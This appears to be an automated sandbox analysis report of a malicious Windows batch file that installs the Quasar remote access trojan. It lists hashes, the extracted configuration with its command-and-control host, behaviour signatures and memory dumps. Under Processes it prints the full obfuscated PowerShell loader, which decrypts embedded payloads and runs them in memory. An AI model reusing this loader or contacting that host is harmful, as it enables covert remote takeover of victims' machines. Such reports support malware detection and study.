Analysis

  • max time kernel
    93s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 02:06

General

  • Target

    113c957ba369a4bea2068a9d5596f644e365cb81c19a28cce8ca1382ccc08e2d.cmd

  • Size

    1.6MB

  • MD5

    846debdd4c489b9cdf58cf035011385b

  • SHA1

    edd9486a627bc3f35772e2e79eb7a3aa021569cd

  • SHA256

    113c957ba369a4bea2068a9d5596f644e365cb81c19a28cce8ca1382ccc08e2d

  • SHA512

    c46b02e2a54314bca1695e03196a7041aebe5bede3e857f62e0e634cc2c4ea9ed95d569a73c2b6c935afab5a961a0253ce40988e3c65d9ff33bbaa34a2376f51

  • SSDEEP

    24576:RHSLwbi29FzHWBFGa+EWO41DglXFH9zW9jpWwhVBn2eWKT:/vDOGiWI2DtJ

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes
  • encryption_key

    6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\113c957ba369a4bea2068a9d5596f644e365cb81c19a28cce8ca1382ccc08e2d.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3468
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QbyHvTiQtx89YnRta8IEyPqtyneJjEN3sJ2ZhbHVoLs='); $aes_var.IV=[System.Convert]::FromBase64String('OxX1X2lNZIgN15fz3vySVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$xCITj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$tIajX=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$FlQAx=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($xCITj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $FlQAx.CopyTo($tIajX); $FlQAx.Dispose(); $xCITj.Dispose(); $tIajX.Dispose(); $tIajX.ToArray();}function execute_function($param_var,$param2_var){ IEX '$GhsFa=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$kwssa=$GhsFa.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$kwssa.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$FFjjS = 'C:\Users\Admin\AppData\Local\Temp\113c957ba369a4bea2068a9d5596f644e365cb81c19a28cce8ca1382ccc08e2d.cmd';$host.UI.RawUI.WindowTitle = $FFjjS;$kRRdo=[System.IO.File]::ReadAllText($FFjjS).Split([Environment]::NewLine);foreach ($smNgX in $kRRdo) { if ($smNgX.StartsWith('luZsHxYvUgyKYktkRiik')) { $gnoFR=$smNgX.Substring(20); break; }}$payloads_var=[string[]]$gnoFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:1948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2512

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ruwzaoof.mih.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2512-16-0x000001CBA29C0000-0x000001CBA2AF2000-memory.dmp

      Filesize

      1.2MB

    • memory/2512-11-0x00007FFEF0E10000-0x00007FFEF18D1000-memory.dmp

      Filesize

      10.8MB

    • memory/2512-18-0x00007FFEF0E10000-0x00007FFEF18D1000-memory.dmp

      Filesize

      10.8MB

    • memory/2512-19-0x000001CBA3790000-0x000001CBA37E0000-memory.dmp

      Filesize

      320KB

    • memory/2512-13-0x000001CBA28F0000-0x000001CBA2934000-memory.dmp

      Filesize

      272KB

    • memory/2512-14-0x000001CBA2940000-0x000001CBA29B6000-memory.dmp

      Filesize

      472KB

    • memory/2512-15-0x000001CBA0380000-0x000001CBA038C000-memory.dmp

      Filesize

      48KB

    • memory/2512-0-0x00007FFEF0E13000-0x00007FFEF0E15000-memory.dmp

      Filesize

      8KB

    • memory/2512-29-0x00007FFEF0E10000-0x00007FFEF18D1000-memory.dmp

      Filesize

      10.8MB

    • memory/2512-10-0x000001CBA0330000-0x000001CBA0352000-memory.dmp

      Filesize

      136KB

    • memory/2512-12-0x00007FFEF0E10000-0x00007FFEF18D1000-memory.dmp

      Filesize

      10.8MB

    • memory/2512-20-0x000001CBA38A0000-0x000001CBA3952000-memory.dmp

      Filesize

      712KB

    • memory/2512-21-0x000001CBA3B30000-0x000001CBA3CF2000-memory.dmp

      Filesize

      1.8MB

    • memory/2512-24-0x000001CBA3400000-0x000001CBA3412000-memory.dmp

      Filesize

      72KB

    • memory/2512-25-0x000001CBA3460000-0x000001CBA349C000-memory.dmp

      Filesize

      240KB

    • memory/2512-26-0x00007FFEF0E13000-0x00007FFEF0E15000-memory.dmp

      Filesize

      8KB

    • memory/2512-27-0x00007FFEF0E10000-0x00007FFEF18D1000-memory.dmp

      Filesize

      10.8MB

    • memory/2512-17-0x000001CBA2AF0000-0x000001CBA2E14000-memory.dmp

      Filesize

      3.1MB